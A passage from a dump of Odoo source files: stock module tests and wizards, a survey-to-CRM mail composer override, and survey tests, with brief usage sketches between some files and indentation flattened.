'location_id': self.stock_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 2)
```
#### File: stock/tests/test_packing_neg.py
```python
from odoo.tests.common import TransactionCase
class TestPackingNeg(TransactionCase):
def test_packing_neg(self):
# Create a new "negative" storable product
product_neg = self.env['product.product'].create({
'name': 'Negative product',
'type': 'product',
'categ_id': self.ref('product.product_category_1'),
'list_price': 100.0,
'standard_price': 70.0,
'seller_ids': [(0, 0, {
'delay': 1,
'name': self.ref('base.res_partner_2'),
'min_qty': 2.0,})],
'uom_id': self.ref('uom.product_uom_unit'),
'uom_po_id': self.ref('uom.product_uom_unit'),
})
# Create an incoming picking for this product of 300 PCE from suppliers to stock
vals = {
'name': 'Incoming picking (negative product)',
'partner_id': self.ref('base.res_partner_2'),
'picking_type_id': self.ref('stock.picking_type_in'),
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
'move_lines': [(0, 0, {
'name': 'NEG',
'product_id': product_neg.id,
'product_uom': product_neg.uom_id.id,
'product_uom_qty': 300.00,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
})],
}
pick_neg = self.env['stock.picking'].create(vals)
pick_neg.onchange_picking_type()
pick_neg.move_lines.onchange_product_id()
# Confirm and assign picking
pick_neg.action_confirm()
pick_neg.action_assign()
# Put 120 pieces on Palneg 1 (package), 120 pieces on Palneg 2 with lot A and 60 pieces on Palneg 3
# create lot A
lot_a = self.env['stock.production.lot'].create({'name': 'Lot neg', 'product_id': product_neg.id})
# create package
package1 = self.env['stock.quant.package'].create({'name': 'Palneg 1'})
package2 = self.env['stock.quant.package'].create({'name': 'Palneg 2'})
package3 = self.env['stock.quant.package'].create({'name': 'Palneg 3'})
# Create package for each line and assign it as result_package_id
# create pack operation
pick_neg.move_line_ids[0].write({'result_package_id': package1.id, 'qty_done': 120})
new_pack1 = self.env['stock.move.line'].create({
'product_id': product_neg.id,
'product_uom_id': self.ref('uom.product_uom_unit'),
'picking_id': pick_neg.id,
'lot_id': lot_a.id,
'qty_done': 120,
'result_package_id': package2.id,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock')
})
new_pack2 = self.env['stock.move.line'].create({
'product_id': product_neg.id,
'product_uom_id': self.ref('uom.product_uom_unit'),
'picking_id': pick_neg.id,
'result_package_id': package3.id,
'qty_done': 60,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock')
})
# Transfer the receipt
pick_neg.action_done()
# Make a delivery order of 300 pieces to the customer
vals = {
'name': 'outgoing picking (negative product)',
'partner_id': self.ref('base.res_partner_4'),
'picking_type_id': self.ref('stock.picking_type_out'),
'location_id': self.ref('stock.stock_location_stock'),
'location_dest_id': self.ref('stock.stock_location_customers'),
'move_lines': [(0, 0, {
'name': 'NEG',
'product_id': product_neg.id,
'product_uom': product_neg.uom_id.id,
'product_uom_qty': 300.00,
'location_id': self.ref('stock.stock_location_stock'),
'location_dest_id': self.ref('stock.stock_location_customers'),
})],
}
delivery_order_neg = self.env['stock.picking'].create(vals)
delivery_order_neg.onchange_picking_type()
delivery_order_neg.move_lines.onchange_product_id()
# Assign and confirm
delivery_order_neg.action_confirm()
delivery_order_neg.action_assign()
# Instead of doing the 300 pieces, you decide to take pallet 1 (do not mention
# product in operation here) and 140 pieces from lot A/pallet 2 and 10 pieces from pallet 3
for rec in delivery_order_neg.move_line_ids:
if rec.package_id.name == 'Palneg 1':
rec.qty_done = rec.product_qty
rec.result_package_id = False
elif rec.package_id.name == 'Palneg 2' and rec.lot_id.name == 'Lot neg':
rec.write({
'qty_done': 140,
'result_package_id': False,
})
elif rec.package_id.name == 'Palneg 3':
rec.qty_done = 10
rec.result_package_id = False
# Process this picking
delivery_order_neg.action_done()
# Check the quants: there should be -20 pieces on pallet 2 in stock, and a total quantity
# of 50 in stock from pallet 3 (should be 20+30, as it has been split by reservation)
records = self.env['stock.quant'].search([('product_id', '=', product_neg.id), ('quantity', '!=', '0')])
pallet_3_stock_qty = 0
for rec in records:
if rec.package_id.name == 'Palneg 2' and rec.location_id.id == self.ref('stock.stock_location_stock'):
self.assertTrue(rec.quantity == -20, "Should have -20 pieces in stock on pallet 2. Got " + str(rec.quantity))
self.assertTrue(rec.lot_id.name == 'Lot neg', "It should have kept its Lot")
elif rec.package_id.name == 'Palneg 3' and rec.location_id.id == self.ref('stock.stock_location_stock'):
pallet_3_stock_qty += rec.quantity
else:
self.assertTrue(rec.location_id.id != self.ref('stock.stock_location_stock'), "Unrecognized quant in stock")
self.assertEqual(pallet_3_stock_qty, 50, "Should have 50 pieces in stock on pallet 3")
# Create a picking for reconciling the negative quant
vals = {
'name': 'reconciling_delivery',
'partner_id': self.ref('base.res_partner_4'),
'picking_type_id': self.ref('stock.picking_type_in'),
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
'move_lines': [(0, 0, {
'name': 'NEG',
'product_id': product_neg.id,
'product_uom': product_neg.uom_id.id,
'product_uom_qty': 20.0,
'location_id': self.ref('stock.stock_location_suppliers'),
'location_dest_id': self.ref('stock.stock_location_stock'),
})],
}
delivery_reconcile = self.env['stock.picking'].create(vals)
delivery_reconcile.onchange_picking_type()
delivery_reconcile.move_lines.onchange_product_id()
# Receive 20 products with lot neg in stock with a new incoming shipment that should be on pallet 2
delivery_reconcile.action_confirm()
lot = self.env["stock.production.lot"].search([
('product_id', '=', product_neg.id),
('name', '=', 'Lot neg')], limit=1)
pack = self.env["stock.quant.package"].search([('name', '=', 'Palneg 2')], limit=1)
delivery_reconcile.move_line_ids[0].write({'lot_id': lot.id, 'qty_done': 20.0, 'result_package_id': pack.id})
delivery_reconcile.action_done()
# Check the negative quant was reconciled
neg_quants = self.env['stock.quant'].search([
('product_id', '=', product_neg.id),
('quantity', '<', 0),
('location_id.id', '!=', self.ref('stock.stock_location_suppliers'))])
self.assertTrue(len(neg_quants) == 0, "Negative quants should have been reconciled")
```
#### File: stock/tests/test_proc_rule.py
```python
from odoo.tests.common import TransactionCase
from odoo.tools import mute_logger
class TestProcRule(TransactionCase):
def test_proc_rule(self):
# Create a product route containing a stock rule that will
# generate a move from Stock for every procurement created in Output
product_route = self.env['stock.location.route'].create({
'name': 'Stock -> output route',
'product_selectable': True,
'rule_ids': [(0, 0, {
'name': 'Stock -> output rule',
'action': 'pull',
'picking_type_id': self.ref('stock.picking_type_internal'),
'location_src_id': self.ref('stock.stock_location_stock'),
'location_id': self.ref('stock.stock_location_output'),
})],
})
# Set this route on `product.product_product_3`
self.env.ref('product.product_product_3').write({
'route_ids': [(4, product_route.id)]})
# Create Delivery Order of 10 `product.product_product_3` from Output -> Customer
product = self.env.ref('product.product_product_3')
vals = {
'name': 'Delivery order for procurement',
'partner_id': self.ref('base.res_partner_2'),
'picking_type_id': self.ref('stock.picking_type_out'),
'location_id': self.ref('stock.stock_location_output'),
'location_dest_id': self.ref('stock.stock_location_customers'),
'move_lines': [(0, 0, {
'name': '/',
'product_id': product.id,
'product_uom': product.uom_id.id,
'product_uom_qty': 10.00,
'procure_method': 'make_to_order',
})],
}
pick_output = self.env['stock.picking'].create(vals)
pick_output.move_lines.onchange_product_id()
# Confirm delivery order.
pick_output.action_confirm()
# Run the scheduler.
# Note: if purchase is already installed, the method _run_buy will be called due
# to the purchase demo data. As we update the stock module to run this test, the
# method won't be an attribute of stock.procurement at this moment. For that reason
# we mute the logger when running the scheduler.
with mute_logger('odoo.addons.stock.models.procurement'):
self.env['procurement.group'].run_scheduler()
# Check that a picking was created from stock to output.
moves = self.env['stock.move'].search([
('product_id', '=', self.ref('product.product_product_3')),
('location_id', '=', self.ref('stock.stock_location_stock')),
('location_dest_id', '=', self.ref('stock.stock_location_output')),
('move_dest_ids', 'in', [pick_output.move_lines[0].id])
])
self.assertEqual(len(moves.ids), 1, "It should have created a picking from Stock to Output with the original picking as destination")
```
#### File: stock/tests/test_shipment.py
```python
from odoo.addons.stock.tests.common2 import TestStockCommon
class TestInventory(TestStockCommon):
def test_shipment(self):
# TDE TODO
# picking.action_confirm -> confirm moves
# picking.do_prepare_partial, should create pack ops, write on it ?
# create and confirm an incoming move of product 3
incoming_move = self._create_move_in(self.product_3, self.warehouse_1, create_picking=True, product_uom_qty=50)
incoming_move._action_confirm()
# receive only 40 units of products; this will create a backorder of incoming shipment for the remaining 10
pack_operation = self._create_pack_operation(
self.product_3, 40.0, incoming_move.picking_id,
location_id=self.env.ref('stock.stock_location_suppliers').id, # TDE FIXME: locations
location_dest_id=self.location_1.id)
incoming_move.picking_id.with_context(active_model='stock.picking', active_id=incoming_move.picking_id.id, active_ids=[incoming_move.picking_id.id]).action_done()
# check backorder shipment after receiving partial shipment and check remaining shipment
for move_line in incoming_move.picking_id.move_lines:
self.assertEqual(move_line.product_qty, 40)
self.assertEqual(move_line.state, 'done')
backorder = self.env['stock.picking'].search([('backorder_id', '=', incoming_move.picking_id.id)])
for move_line in backorder.move_lines:
self.assertEqual(move_line.product_qty, 10)
self.assertIn(move_line.state, ['assigned', 'waiting', 'confirmed'])
backorder.with_context(active_model='stock.picking', active_id=backorder.id, active_ids=[backorder.id])
# receive the remaining 10 units from the backorder
pack_operation = self._create_pack_operation(
self.product_3, 10.0, backorder,
location_id=self.env.ref('stock.stock_location_suppliers').id, # TDE FIXME: locations
location_dest_id=self.location_1.id)
backorder.action_done()
# check the incoming shipment after receipt
backorder = self.env['stock.picking'].search([('backorder_id', '=', incoming_move.picking_id.id)])
self.assertEqual(backorder.state, 'done')
for move_line in backorder.move_lines:
self.assertEqual(move_line.state, 'done')
```
#### File: stock/wizard/stock_backorder_confirmation.py
```python
from odoo import api, fields, models, _
from odoo.tools.float_utils import float_compare
class StockBackorderConfirmation(models.TransientModel):
_name = 'stock.backorder.confirmation'
_description = 'Backorder Confirmation'
pick_ids = fields.Many2many('stock.picking', 'stock_picking_backorder_rel')
@api.one
def _process(self, cancel_backorder=False):
if cancel_backorder:
for pick_id in self.pick_ids:
moves_to_log = {}
for move in pick_id.move_lines:
if float_compare(move.product_uom_qty, move.quantity_done, precision_rounding=move.product_uom.rounding) > 0:
moves_to_log[move] = (move.quantity_done, move.product_uom_qty)
pick_id._log_less_quantities_than_expected(moves_to_log)
self.pick_ids.action_done()
if cancel_backorder:
for pick_id in self.pick_ids:
backorder_pick = self.env['stock.picking'].search([('backorder_id', '=', pick_id.id)])
backorder_pick.action_cancel()
pick_id.message_post(body=_("Back order <em>%s</em> <b>cancelled</b>.") % (",".join([b.name or '' for b in backorder_pick])))
def process(self):
self._process()
def process_cancel_backorder(self):
self._process(cancel_backorder=True)
```
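A minimal sketch of driving this wizard from server-side code or a test follows; it assumes `pick` is an existing, partially processed `stock.picking` record (a placeholder). In practice the wizard is usually offered by the picking validation flow, so this is illustrative only.
```python
# Hypothetical usage: `pick` is a partially done stock.picking record.
wizard = self.env['stock.backorder.confirmation'].create({
    'pick_ids': [(4, pick.id)],
})
# Validate the picking and keep the remaining quantity in a backorder...
wizard.process()
# ...or, alternatively, validate and cancel the backorder, logging the
# shortfall on the picking:
# wizard.process_cancel_backorder()
```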
#### File: stock/wizard/stock_package_destination.py
```python
from odoo import api, fields, models
class ChooseDestinationLocation(models.TransientModel):
_name = 'stock.package.destination'
_description = 'Stock Package Destination'
picking_id = fields.Many2one('stock.picking', required=True)
move_line_ids = fields.Many2many('stock.move.line', 'Products', compute='_compute_move_line_ids', required=True)
location_dest_id = fields.Many2one('stock.location', 'Destination location', required=True)
filtered_location = fields.One2many(comodel_name='stock.location', compute='_filter_location')
@api.one
@api.depends('picking_id')
def _compute_move_line_ids(self):
self.move_line_ids = self.picking_id.move_line_ids.filtered(lambda l: l.qty_done > 0 and not l.result_package_id)
@api.one
@api.depends('move_line_ids')
def _filter_location(self):
self.filtered_location = self.move_line_ids.mapped('location_dest_id')
def action_done(self):
# set the same location on each move line and call put_in_pack again
for line in self.move_line_ids:
line.location_dest_id = self.location_dest_id
return self.picking_id.put_in_pack()
```
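A rough usage sketch, assuming `pick` is a picking whose done move lines point to several destination locations and `shelf` is the location the user finally chooses (both names are placeholders):
```python
# Hypothetical usage: force a single destination before putting lines in a pack.
wizard = self.env['stock.package.destination'].create({
    'picking_id': pick.id,
    'location_dest_id': shelf.id,
})
# Writes the chosen destination on every computed move line,
# then re-runs put_in_pack on the picking.
wizard.action_done()
```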
#### File: stock/wizard/stock_quantity_history.py
```python
from odoo import api, fields, models, _
class StockQuantityHistory(models.TransientModel):
_name = 'stock.quantity.history'
_description = 'Stock Quantity History'
compute_at_date = fields.Selection([
(0, 'Current Inventory'),
(1, 'At a Specific Date')
], string="Compute", help="Choose to analyze the current inventory or from a specific date in the past.")
date = fields.Datetime('Inventory at Date', help="Choose a date to get the inventory at that date", default=fields.Datetime.now)
def open_table(self):
self.ensure_one()
if self.compute_at_date:
tree_view_id = self.env.ref('stock.view_stock_product_tree').id
form_view_id = self.env.ref('stock.product_form_view_procurement_button').id
# We pass `to_date` in the context so that `qty_available` will be computed across
# moves up to that date.
action = {
'type': 'ir.actions.act_window',
'views': [(tree_view_id, 'tree'), (form_view_id, 'form')],
'view_mode': 'tree,form',
'name': _('Products'),
'res_model': 'product.product',
'domain': "[('type', '=', 'product')]",
'context': dict(self.env.context, to_date=self.date),
}
return action
else:
self.env['stock.quant']._merge_quants()
self.env['stock.quant']._unlink_zero_quants()
return self.env.ref('stock.quantsact').read()[0]
```
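A short sketch of the "At a Specific Date" branch, assuming it is called from server-side code; the date value is an arbitrary example. The interesting part is that the returned action carries `to_date` in its context, which is what makes `qty_available` historical on the opened product list.
```python
# Hypothetical usage of the wizard from code or a test.
wizard = self.env['stock.quantity.history'].create({
    'compute_at_date': 1,            # 'At a Specific Date'
    'date': '2019-01-01 00:00:00',
})
action = wizard.open_table()
# qty_available on the listed products is now computed from moves up to `date` only.
assert action['context']['to_date'] == wizard.date
```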
#### File: stock/wizard/stock_track_confirmation.py
```python
from odoo import api, models, fields, tools
class StockTrackConfirmation(models.TransientModel):
_name = 'stock.track.confirmation'
_description = 'Stock Track Confirmation'
tracking_line_ids = fields.One2many('stock.track.line', 'wizard_id')
inventory_id = fields.Many2one('stock.inventory', 'Inventory')
@api.one
def action_confirm(self):
return self.inventory_id._action_done()
class StockTrackingLines(models.TransientModel):
_name = 'stock.track.line'
_description = 'Stock Track Line'
product_id = fields.Many2one('product.product', 'Product', readonly=True)
tracking = fields.Selection([('lot', 'Tracked by lot'), ('serial', 'Tracked by serial number')], readonly=True)
wizard_id = fields.Many2one('stock.track.confirmation', readonly=True)
```
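A minimal sketch of the confirmation flow, assuming `inventory` is an existing `stock.inventory` with a tracked product that is missing lot/serial numbers; in practice the wizard is returned by the inventory validation, so creating it by hand like this is only illustrative.
```python
# Hypothetical usage: confirm an inventory despite missing lot/serial numbers.
wizard = self.env['stock.track.confirmation'].create({
    'inventory_id': inventory.id,
    'tracking_line_ids': [(0, 0, {
        'product_id': inventory.product_id.id,
        'tracking': 'serial',
    })],
})
wizard.action_confirm()   # simply delegates to inventory._action_done()
```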
#### File: survey_crm/models/survey.py
```python
from odoo import api, models
class SurveyComposeMessage(models.TransientModel):
_inherit = 'survey.mail.compose.message'
@api.model
def default_get(self, fields):
result = super(SurveyComposeMessage, self).default_get(fields)
if self._context.get('active_model') == 'crm.lead' and self._context.get('active_ids'):
partner_ids = []
emails_list = []
for lead in self.env['crm.lead'].browse(self._context.get('active_ids')):
if lead.partner_id:
partner_ids.append(lead.partner_id.id)
else:
email = lead.contact_name and "%s <%s>" % (lead.contact_name, lead.email_from or "") or lead.email_from or None
if email and email not in emails_list:
emails_list.append(email)
multi_email = "\n".join(emails_list)
result.update({'partner_ids': list(set(partner_ids)), 'multi_email': multi_email})
return result
```
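A rough sketch of how this override is exercised, assuming `leads` is a `crm.lead` recordset selected in the UI (the variable is a placeholder): leads linked to a partner end up in `partner_ids`, the others contribute one line each to `multi_email`.
```python
# Hypothetical usage: gather recipients from a selection of crm.lead records.
defaults = self.env['survey.mail.compose.message'].with_context(
    active_model='crm.lead',
    active_ids=leads.ids,
).default_get(['partner_ids', 'multi_email'])
print(defaults.get('partner_ids'))   # partner ids of leads that have a partner
print(defaults.get('multi_email'))   # newline-separated emails of the others
```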
#### File: survey/tests/test_survey.py
```python
import random
import re
from collections import Counter
from itertools import product
from werkzeug import urls
from odoo import _
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import UserError
from odoo.tests.common import TransactionCase
class TestSurvey(TransactionCase):
def setUp(self):
super(TestSurvey, self).setUp()
User = self.env['res.users'].with_context({'no_reset_password': True})
(group_survey_user, group_employee) = (self.ref('survey.group_survey_user'), self.ref('base.group_user'))
self.survey_manager = User.create({
'name': '<NAME>', 'login': 'Gustav','email': '<EMAIL>',
'groups_id': [(6, 0, [self.ref('survey.group_survey_manager'), group_survey_user, group_employee])]})
self.survey_user = User.create({
'name': '<NAME>', 'login': 'Lukas', 'email': '<EMAIL>',
'groups_id': [(6, 0, [group_survey_user, group_employee])]})
self.user_public = User.create({
'name': '<NAME>', 'login': 'Wout', 'email': '<EMAIL>',
'groups_id': [(6, 0, [self.ref('base.group_public')])]})
self.survey1 = self.env['survey.survey'].sudo(self.survey_manager).create({'title': "S0", 'page_ids': [(0, 0, {'title': "P0"})]})
self.page1 = self.survey1.page_ids[0]
def test_00_create_minimal_survey(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0'})
self.assertEqual(self.survey1.title, "S0", msg="Title of the survey is somehow modified.")
self.assertEqual(len(self.survey1.page_ids), 1, msg="Additional Pages are linked with the survey after creation.")
self.assertEqual(self.page1.title, "P0", msg="Title of the page is somehow modified.")
self.assertEqual(len(self.page1.question_ids), 1, msg="Additional questions are linked with the page after creation.")
self.assertEqual(question.question, "Q0", msg="Title of the Question is somehow modified.")
def test_01_question_type_validation_save_line_function(self):
for (question_type, text) in self.env['survey.question']._fields['type'].selection:
# Each question type must have a validation function.
self.assertTrue(hasattr(self.env['survey.question'], 'validate_' + question_type), msg="Question must have a validation method in\
the form of 'validate_' followed by the name of the type.")
# Survey user input lines must have a save function for each question type.
self.assertTrue(hasattr(self.env['survey.user_input_line'], 'save_line_' + question_type), msg="Inputline must have Save method in \
the form of 'save_line_' followed by the name of the type.")
def test_02_question_answer_required(self):
for (question_type, text) in self.env['survey.question']._fields['type'].selection:
# Blank value of field is not accepted for mandatory questions.
if question_type == 'multiple_choice':
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'multiple_choice',
'constr_mandatory': True, 'constr_error_msg': 'Error',
'labels_ids': [(0, 0, {'value': "MChoice0", "quizz_mark": 0}), (0, 0, {'value': "MChoice1", "quizz_mark": 0})]})
elif question_type == 'matrix':
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'matrix', 'matrix_subtype': 'simple',
'constr_mandatory': True, 'constr_error_msg': 'Error',
'labels_ids': [(0, 0, {'value': "Column0", "quizz_mark": 0}), (0, 0, {'value': "Column1", "quizz_mark": 0})],
'labels_ids_2': [(0, 0, {'value': "Row0", "quizz_mark": 0}), (0, 0, {'value': "Row1", "quizz_mark": 0})]})
else:
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': question_type, 'constr_mandatory': True, 'constr_error_msg': 'Error'})
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, question.id)
self.assertDictEqual({answer_tag: "Error"}, question.validate_question({answer_tag: ''}, answer_tag),
msg=("Validation function for type %s is unable to generate error if it is mandatory and answer is blank." % question_type))
def test_03_question_textbox(self):
questions = [
self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'textbox', 'validation_email': True}),
self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q1', 'type': 'textbox', 'validation_required': True,
'validation_length_min': 2, 'validation_length_max': 8, 'validation_error_msg': "Error"})]
results = [('test @ testcom', _('This answer must be an email address')), ('t', 'Error')]
for i in range(len(questions)):
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, questions[i].id)
self.assertEqual(questions[i].validate_question({answer_tag: results[i][0]}, answer_tag), {answer_tag: results[i][1]}, msg="\
Validation function for textbox is unable to notify if answer is violating the validation rules")
def test_04_question_numerical_box(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'numerical_box', 'validation_required': True,
'validation_min_float_value': 2.1, 'validation_max_float_value': 3.0, 'validation_error_msg': "Error"})
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, question.id)
results = [('aaa', _('This is not a number')), ('4.5', 'Error'), ('0.1', 'Error')]
for i in range(len(results)):
self.assertEqual(question.validate_question({answer_tag: results[i][0]}, answer_tag), {answer_tag: results[i][1]}, msg="\
Validation function for type numerical_box is unable to notify if answer is violating the validation rules")
def test_05_question_date(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'date', 'validation_required': True,
'validation_min_date': '2015-03-20', 'validation_max_date': '2015-03-25', 'validation_error_msg': "Error"})
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, question.id)
results = [('2015-55-10', _('This is not a date')), ('2015-03-19', 'Error'), ('2015-03-26', 'Error')]
for i in range(len(results)):
self.assertEqual(question.validate_question({answer_tag: results[i][0]}, answer_tag), {answer_tag: results[i][1]}, msg="\
Validation function for type date is unable to notify if answer is violating the validation rules")
def test_06_survey_sharing(self):
# Case-1: Executing action with correct data.
correct_survey = self.env['survey.survey'].sudo(self.survey_manager).create({
'title': "S0", 'stage_id': self.env['survey.stage'].search([('sequence', '=', 1)]).id,
'page_ids': [(0, 0, {'title': "P0", 'question_ids': [(0, 0, {'question': "Q0", 'type': 'free_text'})]})]})
action = correct_survey.action_send_survey()
template = self.env.ref('survey.email_template_survey', raise_if_not_found=False)
ctx = dict(
self.env.context,
default_model='survey.survey',
default_res_id=correct_survey.id,
default_survey_id=correct_survey.id,
default_use_template=bool(template),
default_template_id=template and template.id or False,
default_composition_mode='comment',
notif_layout='mail.mail_notification_light',
)
self.assertDictEqual(action, {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'survey.mail.compose.message',
'target': 'new',
'context': ctx,
})
# Case-2: Executing action with incorrect data.
surveys = [
self.env['survey.survey'].sudo(self.survey_manager).create({ # Survey without any page or question.
'title': "Test survey"}),
self.env['survey.survey'].sudo(self.survey_manager).create({ # Closed Survey.
'title': "S0", 'stage_id': self.env['survey.stage'].search([('closed', '=', True)]).id, # Getting Closed stage id.
'page_ids': [(0, 0, {'title': "P0", 'question_ids': [(0, 0, {'question': "Q0", 'type': 'free_text'})]})]})]
for survey in surveys:
self.assertRaises(UserError, survey.action_send_survey)
def test_07_survey_email_message(self):
# Case-1: Executing send_mail with correct data.
partner = self.env['res.partner'].create({'name': '<NAME>', 'email': '<EMAIL>'})
survey_mail_message = self.env['survey.mail.compose.message'].sudo(self.survey_manager).create({
'survey_id': self.survey1.id, 'public': 'email_public_link', 'body': '__URL__', 'partner_ids': [(4, partner.id)]})
survey_mail_message.send_mail()
# Case-2: Executing send_mail with incorrect data.
mail_messages = [
self.env['survey.mail.compose.message'].sudo(self.survey_manager).create({ # Mail Message without __URL__ in body.
'survey_id': self.survey1.id, 'public': 'email_public_link'}),
self.env['survey.mail.compose.message'].sudo(self.survey_manager).create({ # Mail Message without recipients.
'survey_id': self.survey1.id, 'public': 'email_public_link', 'body': "__URL__"})]
for message in mail_messages:
self.assertRaises(UserError, message.send_mail)
def test_08_survey_urls(self):
def validate_url(url):
""" Reference: https://github.com/django/django/blob/master/django/core/validators.py """
url_regex = re.compile(
r'^https?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return True if url_regex.match(url) else False
base_url = self.env['ir.config_parameter'].get_param('web.base.url')
urltypes = {'public': 'start', 'print': 'print', 'result': 'results'}
for urltype, urltxt in urltypes.items():
survey_url = getattr(self.survey1, urltype + '_url')
survey_url_relative = getattr(self.survey1.with_context({'relative_url': True}), urltype + '_url')
self.assertTrue(validate_url(survey_url))
url = "survey/%s/%s" % (urltxt, slug(self.survey1))
full_url = urls.url_join(base_url, url)
self.assertEqual(full_url, survey_url)
self.assertEqual('/' + url, survey_url_relative)
if urltype == 'public':
url_html = '<a href="%s">Click here to start survey</a>'
self.assertEqual(url_html % full_url, getattr(self.survey1, urltype + '_url_html'), msg="Public URL is incorrect")
self.assertEqual(url_html % ('/' + url), getattr(self.survey1.with_context({'relative_url': True}), urltype + '_url_html'), msg="Public URL is incorrect.")
def test_09_answer_survey(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0'})
input_portal = self.env['survey.user_input'].sudo(self.survey_user).create({
'survey_id': self.survey1.id,
'partner_id': self.survey_user.partner_id.id,
'user_input_line_ids': [(0, 0, {
'skipped': False, 'answer_type': 'free_text', 'value_free_text': "Test Answer",
'survey_id': self.survey1.id, 'question_id': question.id})]})
input_public = self.env['survey.user_input'].sudo(self.user_public).create({
'survey_id': self.survey1.id,
'partner_id': self.survey_user.partner_id.id,
'user_input_line_ids': [(0, 0, {
'skipped': False, 'answer_type': 'free_text', 'value_free_text': "Test Answer",
'survey_id': self.survey1.id, 'question_id': question.id})]})
answers = [input_portal.user_input_line_ids[0], input_public.user_input_line_ids[0]]
expected_values = {'answer_type': 'free_text', 'value_free_text': "Test Answer"}
for answer in answers:
for field, value in expected_values.items():
self.assertEqual(answer[field], value, msg="Unable to answer the survey. Expected behaviour of %s is not proper." % (field))
def test_10_survey_result_simple_multiple_choice(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'simple_choice',
'labels_ids': [(0, 0, {'value': "Choice0", 'quizz_mark': 0}), (0, 0, {'value': "Choice1", 'quizz_mark': 0})]})
for i in range(3):
self.env['survey.user_input'].sudo(self.user_public).create({'survey_id': self.survey1.id, 'user_input_line_ids': [(0, 0, {
'question_id': question.id,
'answer_type': 'suggestion',
'value_suggested': random.choice(question.labels_ids.ids)})]})
lines = [line.value_suggested.id for line in question.user_input_line_ids]
answers = [{'text': label.value, 'count': lines.count(label.id), 'answer_id': label.id} for label in question.labels_ids]
prp_result = self.env['survey.survey'].prepare_result(question)['answers']
self.assertItemsEqual(prp_result, answers, msg="Statistics of simple, multiple choice questions are different from expectation")
def test_11_survey_result_matrix(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'matrix', 'matrix_subtype': 'simple',
'labels_ids': [(0, 0, {'value': "Column0", "quizz_mark": 0}), (0, 0, {'value': "Column1", "quizz_mark": 0})],
'labels_ids_2': [(0, 0, {'value': "Row0", "quizz_mark": 0}), (0, 0, {'value': "Row1", "quizz_mark": 0})]})
for i in range(3):
self.env['survey.user_input'].sudo(self.user_public).create({'survey_id': self.survey1.id, 'user_input_line_ids': [(0, 0, {
'question_id': question.id, 'answer_type': 'suggestion', 'value_suggested': random.choice(question.labels_ids.ids),
'value_suggested_row': random.choice(question.labels_ids_2.ids)})]})
lines = [(line.value_suggested_row.id, line.value_suggested.id) for line in question.user_input_line_ids]
res = {}
for i in product(question.labels_ids_2.ids, question.labels_ids.ids):
res[i] = lines.count((i))
self.assertEqual(self.env['survey.survey'].prepare_result(question)['result'], res, msg="Statistics of matrix type questions are different from expectations")
def test_12_survey_result_numeric_box(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0', 'type': 'numerical_box'})
num = [float(n) for n in random.sample(range(1, 100), 3)]
nsum = sum(num)
for i in range(3):
self.env['survey.user_input'].sudo(self.user_public).create({'survey_id': self.survey1.id, 'user_input_line_ids': [(0, 0, {
'question_id': question.id, 'answer_type': 'number', 'value_number': num[i]})]})
exresult = {
'average': round((nsum / len(num)), 2), 'max': round(max(num), 2),
'min': round(min(num), 2), 'sum': nsum, 'most_common': Counter(num).most_common(5)}
result = self.env['survey.survey'].prepare_result(question)
for key in exresult:
self.assertEqual(result[key], exresult[key], msg="Statistics of numeric box type questions are different from expectations")
def test_13_survey_actions(self):
self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0', 'type': 'numerical_box'})
actions = {
'start': {'method': 'public', 'token': '/test', 'text': 'Start'},
'print': {'method': 'print', 'token': '/test', 'text': 'Print'},
'result': {'method': 'result', 'token': '', 'text': 'Results of the'},
'test': {'method': 'public', 'token': '/<PASSWORD>', 'text': 'Results of the'}}
for action, val in actions.items():
result = getattr(self.survey1.with_context({'survey_token': val['token'][1:]}), 'action_' + action + '_survey')()
url = getattr(self.survey1.with_context({'relative_url': True}), val['method'] + '_url') + val['token']
self.assertEqual(result['url'], url)
```
#### File: test_mail/tests/test_mail_followers.py
```python
from psycopg2 import IntegrityError
from odoo.addons.test_mail.tests import common
